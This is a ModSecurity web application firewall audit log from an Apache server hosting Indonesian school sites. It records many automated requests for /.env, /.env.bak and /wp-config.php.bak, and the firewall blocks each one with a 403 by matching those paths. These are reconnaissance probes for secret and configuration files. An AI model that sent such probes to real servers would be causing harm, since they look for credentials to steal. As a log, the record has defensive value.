Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745095352288224 3868 (- - -)
Stopwatch2: 1745095352288224 3868; combined=1652, p1=795, p2=808, p3=0, p4=0, p5=49, sr=123, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ca9edd41-Z--
--81248f65-A--
[20/Apr/2025:05:33:53 +0700] aAQk0Vu16wJWB6g0mU_4igAAAA0 103.236.140.4 37730 103.236.140.4 8181
--81248f65-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 196.251.69.35
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 196.251.69.35
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--81248f65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--81248f65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745102033293030 871 (- - -)
Stopwatch2: 1745102033293030 871; combined=382, p1=346, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--81248f65-Z--
--80a86f47-A--
[20/Apr/2025:05:33:53 +0700] aAQk0Vu16wJWB6g0mU_4iwAAAA4 103.236.140.4 37736 103.236.140.4 8181
--80a86f47-B--
GET /.env HTTP/1.0
Host: www.smkn22-jkt.sch.id
X-Real-IP: 196.251.69.35
X-Forwarded-Host: www.smkn22-jkt.sch.id
X-Forwarded-Server: www.smkn22-jkt.sch.id
X-Forwarded-For: 196.251.69.35
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--80a86f47-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--80a86f47-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745102033942972 801 (- - -)
Stopwatch2: 1745102033942972 801; combined=342, p1=307, p2=0, p3=0, p4=0, p5=35, sr=126, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--80a86f47-Z--
--52ceca2d-A--
[20/Apr/2025:06:36:45 +0700] aAQzjcTCDeBrh52UaHTP9wAAAI8 103.236.140.4 52382 103.236.140.4 8181
--52ceca2d-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 195.178.110.137
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 195.178.110.137
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--52ceca2d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--52ceca2d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745105805838675 868 (- - -)
Stopwatch2: 1745105805838675 868; combined=333, p1=284, p2=0, p3=0, p4=0, p5=49, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--52ceca2d-Z--
--4d69b226-A--
[20/Apr/2025:07:08:30 +0700] aAQ6_kAzeWrUIk0gvAsucwAAAMs 103.236.140.4 48778 103.236.140.4 8181
--4d69b226-B--
GET /wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 65.109.55.146
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 65.109.55.146
X-Forwarded-Proto: http
Connection: close
Accept: */*
--4d69b226-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4d69b226-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745107710876301 1073 (- - -)
Stopwatch2: 1745107710876301 1073; combined=280, p1=240, p2=0, p3=0, p4=0, p5=40, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4d69b226-Z--
--1965c50a-A--
[20/Apr/2025:07:48:45 +0700] aAREbVu16wJWB6g0mU8mAwAAAAo 103.236.140.4 40198 103.236.140.4 8181
--1965c50a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36
Accept-Charset: utf-8
--1965c50a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1965c50a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745110125451322 991 (- - -)
Stopwatch2: 1745110125451322 991; combined=479, p1=435, p2=0, p3=0, p4=0, p5=44, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1965c50a-Z--
--824fd01e-A--
[20/Apr/2025:08:23:20 +0700] aARMiFTf0pL9EQC7JDVB-QAAAFA 103.236.140.4 42018 103.236.140.4 8181
--824fd01e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.71.217
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.71.217
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--824fd01e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--824fd01e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745112200636642 756 (- - -)
Stopwatch2: 1745112200636642 756; combined=308, p1=269, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--824fd01e-Z--
--5fcd6732-A--
[20/Apr/2025:09:04:27 +0700] aARWK8TCDeBrh52UaHT8SQAAAI0 103.236.140.4 54288 103.236.140.4 8181
--5fcd6732-B--
GET /.env.bak HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 103.59.160.222
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 103.59.160.222
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--5fcd6732-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5fcd6732-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745114667384881 705 (- - -)
Stopwatch2: 1745114667384881 705; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5fcd6732-Z--
--61c91f36-A--
[20/Apr/2025:09:13:04 +0700] aARYMFTf0pL9EQC7JDVF_QAAAFI 103.236.140.4 56636 103.236.140.4 8181
--61c91f36-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 5.39.19.177
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 5.39.19.177
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--61c91f36-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--61c91f36-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745115184545974 811 (- - -)
Stopwatch2: 1745115184545974 811; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=131, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--61c91f36-Z--
--c2c4617f-A--
[20/Apr/2025:09:55:51 +0700] aARiN1Tf0pL9EQC7JDVIewAAAEY 103.236.140.4 38164 103.236.140.4 8181
--c2c4617f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.34
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.34
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; Lenovo K33a42) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36
Accept-Charset: utf-8
--c2c4617f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c2c4617f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745117751328318 803 (- - -)
Stopwatch2: 1745117751328318 803; combined=340, p1=297, p2=0, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c2c4617f-Z--
--52443a5e-A--
[20/Apr/2025:10:49:37 +0700] aARu0cTCDeBrh52UaHQWbAAAAIE 103.236.140.4 59894 103.236.140.4 8181
--52443a5e-B--
GET /.env.bak HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 103.59.160.222
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie:
X-Forwarded-For: 103.59.160.222
Accept-Encoding: gzip
X-Varnish: 130716468
--52443a5e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--52443a5e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745120977827174 829 (- - -)
Stopwatch2: 1745120977827174 829; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--52443a5e-Z--
--47164614-A--
[20/Apr/2025:11:17:05 +0700] aAR1QUAzeWrUIk0gvAuF2wAAANY 103.236.140.4 44796 103.236.140.4 8181
--47164614-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.84.0.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.84.0.171
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--47164614-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47164614-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745122625880862 869 (- - -)
Stopwatch2: 1745122625880862 869; combined=334, p1=294, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47164614-Z--
--4975402d-A--
[20/Apr/2025:11:17:08 +0700] aAR1RFu16wJWB6g0mU9YjwAAAAY 103.236.140.4 44870 103.236.140.4 8181
--4975402d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.84.0.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.84.0.171
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--4975402d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4975402d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745122628798734 775 (- - -)
Stopwatch2: 1745122628798734 775; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4975402d-Z--
--402a6c28-A--
[20/Apr/2025:11:40:01 +0700] aAR6oVTf0pL9EQC7JDV8ugAAAFM 103.236.140.4 45696 103.236.140.4 8181
--402a6c28-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.17
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.17
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--402a6c28-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--402a6c28-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745124001849252 701 (- - -)
Stopwatch2: 1745124001849252 701; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--402a6c28-Z--
--3b7f7319-A--
[20/Apr/2025:11:40:25 +0700] aAR6uVu16wJWB6g0mU9lqwAAAAM 103.236.140.4 45792 103.236.140.4 8181
--3b7f7319-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.17
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.17
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--3b7f7319-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3b7f7319-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745124025402584 748 (- - -)
Stopwatch2: 1745124025402584 748; combined=301, p1=261, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3b7f7319-Z--
--2061403f-A--
[20/Apr/2025:11:51:44 +0700] aAR9YFTf0pL9EQC7JDWEdQAAAEg 103.236.140.4 51058 103.236.140.4 8181
--2061403f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.154.252.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.154.252.208
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--2061403f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2061403f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745124704606050 553 (- - -)
Stopwatch2: 1745124704606050 553; combined=218, p1=189, p2=0, p3=0, p4=0, p5=29, sr=50, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2061403f-Z--
--9468cd7a-A--
[20/Apr/2025:11:51:46 +0700] aAR9YsTCDeBrh52UaHQ8VwAAAIs 103.236.140.4 51134 103.236.140.4 8181
--9468cd7a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.154.252.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.154.252.208
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--9468cd7a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9468cd7a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745124706012668 717 (- - -)
Stopwatch2: 1745124706012668 717; combined=280, p1=237, p2=0, p3=0, p4=0, p5=43, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9468cd7a-Z--
--fb3b9855-A--
[20/Apr/2025:12:18:04 +0700] aASDjFu16wJWB6g0mU-EHQAAABQ 103.236.140.4 46094 103.236.140.4 8181
--fb3b9855-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 206.189.2.13
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 206.189.2.13
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--fb3b9855-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fb3b9855-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745126284788238 814 (- - -)
Stopwatch2: 1745126284788238 814; combined=286, p1=250, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fb3b9855-Z--
--10fa324c-A--
[20/Apr/2025:14:03:41 +0700] aAScTcTCDeBrh52UaHRfIQAAAJg 103.236.140.4 43732 103.236.140.4 8181
--10fa324c-B--
GET /.env.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 103.59.160.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.59.160.222
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--10fa324c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--10fa324c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132621501183 821 (- - -)
Stopwatch2: 1745132621501183 821; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--10fa324c-Z--
--0a1c4943-A--
[20/Apr/2025:14:04:14 +0700] aAScblu16wJWB6g0mU-b5QAAAAA 103.236.140.4 43868 103.236.140.4 8181
--0a1c4943-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: https
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2
--0a1c4943-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0a1c4943-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
